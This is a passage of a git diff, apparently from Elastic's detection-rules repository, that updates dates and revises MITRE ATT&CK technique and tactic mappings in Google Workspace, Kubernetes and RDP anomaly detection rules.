"https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml index 986aac4bd3d..479e37fcf31 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_password_policy_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,14 +111,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml index 040e19fdd98..57d821e3325 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_role_modified.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,14 +106,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml index cb0bc8fec70..5d52d7026ce 100644 --- a/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml +++ b/rules/integrations/google_workspace/persistence_google_workspace_user_organizational_unit_changed.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/06" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,19 +106,36 @@ event.dataset:"google_workspace.admin" and event.type:change and event.category: [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml index 8bc3d051239..b86f191f01d 100644 --- a/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml +++ b/rules/integrations/google_workspace/persistence_mfa_disabled_for_google_workspace_organization.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["google_workspace"] maturity = "production" -updated_date = "2024/09/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,14 +100,26 @@ event.dataset:google_workspace.admin and event.provider:admin and event.category [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml index 0a6f1a1293f..5bfd274a247 100644 --- a/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml +++ b/rules/integrations/kubernetes/credential_access_azure_arc_proxy_secret_configmap_access.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/10" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,31 +111,54 @@ FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.007" name = "Container API" reference = "https://attack.mitre.org/techniques/T1552/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + [[rule.threat.technique]] id = "T1530" name = "Data from Cloud Storage" reference = "https://attack.mitre.org/techniques/T1530/" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1565" +name = "Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/" + +[[rule.threat.technique.subtechnique]] +id = "T1565.001" +name = "Stored Data Manipulation" +reference = "https://attack.mitre.org/techniques/T1565/001/" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 7e2e716541f..2afce3c35ea 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,6 +98,41 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml b/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml index a8929be63ef..78095ce33eb 100644 --- a/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml +++ b/rules/integrations/kubernetes/discovery_endpoint_permission_enumeration_by_anonymous_user.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -137,3 +137,21 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat.technique.subtechnique]] +id = "T1595.003" +name = "Wordlist Scanning" +reference = "https://attack.mitre.org/techniques/T1595/003/" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml index 359940c58b7..8d281cecbaf 100644 --- a/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml +++ b/rules/integrations/kubernetes/discovery_suspicious_self_subject_review.toml @@ -2,7 +2,7 @@ creation_date = "2022/06/30" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,6 +91,16 @@ kubernetes.audit.objectRef.resource:("selfsubjectaccessreviews" or "selfsubjectr [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.003" +name = "Cloud Groups" +reference = "https://attack.mitre.org/techniques/T1069/003/" + [[rule.threat.technique]] id = "T1613" name = "Container and Resource Discovery" @@ -100,7 +110,6 @@ reference = "https://attack.mitre.org/techniques/T1613/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml index 25df5e78816..0a7e58df7b7 100644 --- a/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml +++ b/rules/integrations/kubernetes/execution_anonymous_create_update_patch_pod_request.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -40,6 +40,11 @@ kubernetes.audit.objectRef.resource == "pods" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index 19a1619b8ab..46cf1eb9e04 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/24" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/01/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,3 +78,19 @@ framework = "MITRE ATT&CK" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml index b6fa7170cb4..3ee8f23c9b9 100644 --- a/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml +++ b/rules/integrations/kubernetes/execution_forbidden_request_from_unsual_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -79,6 +79,18 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml index 1dcd69850d3..da9b80ada3d 100644 --- a/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml +++ b/rules/integrations/kubernetes/execution_unusual_request_response_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/18" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,6 +84,31 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["kubernetes.audit.annotations.authorization_k8s_io/decision", "kubernetes.audit.user.username", "user_agent.original"] diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml index a850dfd2023..792d42d750c 100644 --- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml +++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -103,6 +103,18 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml index ac83b601e4d..fb3b3e9c302 100644 --- a/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml +++ b/rules/integrations/kubernetes/persistence_cluster_admin_rolebinding_created.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,21 +86,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml index 229f671329b..f19fb4cd1e0 100644 --- a/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml +++ b/rules/integrations/kubernetes/persistence_exposed_service_created_with_type_nodeport.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2025/06/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,14 +91,26 @@ event.dataset : "kubernetes.audit_logs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1133" name = "External Remote Services" reference = "https://attack.mitre.org/techniques/T1133/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1133" +name = "External Remote Services" +reference = "https://attack.mitre.org/techniques/T1133/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml index 0bb148e3260..f9329ea135b 100644 --- a/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml +++ b/rules/integrations/kubernetes/persistence_sensitive_role_creation_or_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/03" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,21 +106,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml index 746ad89fe61..a433254e859 100644 --- a/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml +++ b/rules/integrations/kubernetes/persistence_service_account_bound_to_clusterrole.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,21 +84,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.006" -name = "Additional Container Cluster Roles" -reference = "https://attack.mitre.org/techniques/T1098/006/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml index ec7881b3507..3a035b3ef2e 100644 --- a/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml +++ b/rules/integrations/kubernetes/privilege_escalation_container_created_with_excessive_linux_capabilities.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/20" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -106,3 +106,16 @@ reference = "https://attack.mitre.org/techniques/T1610/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml index 15f42caaf18..00cfc028b8d 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,3 +122,16 @@ reference = "https://attack.mitre.org/techniques/T1610/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml index f68d1d287ff..00b34f2cfe3 100644 --- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml +++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -120,3 +120,16 @@ reference = "https://attack.mitre.org/techniques/T1610/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml index 550d4cdd47e..44a7da15684 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,3 +114,16 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index cd55cbf8734..5db31548fc8 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/05" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/03/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,6 +107,18 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index 0314f867e2f..dd96a8d835c 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/04" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,3 +110,16 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index 6c59087b0b3..fe4db96ec06 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/13" integration = ["kubernetes"] maturity = "production" -updated_date = "2026/02/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,3 +107,16 @@ reference = "https://attack.mitre.org/techniques/T1078/001/" id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1610" +name = "Deploy Container" +reference = "https://attack.mitre.org/techniques/T1610/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml index a2e6b2e13ee..d7e8c4ec45a 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_process_args.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" +updated_date = "2026/03/24" [rule] anomaly_threshold = 70 @@ -95,14 +95,23 @@ Remote Desktop Protocol (RDP) facilitates remote access to systems, often target - Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems have been compromised.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.001" +name = "Remote Desktop Protocol" +reference = "https://attack.mitre.org/techniques/T1021/001/" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml index db8f0b280e8..c4a9de77ab2 100644 --- a/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml +++ b/rules/integrations/lmd/lateral_movement_ml_high_mean_rdp_session_duration.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/12" integration = ["lmd", "endpoint"] maturity = "production" -updated_date = "2026/02/11" 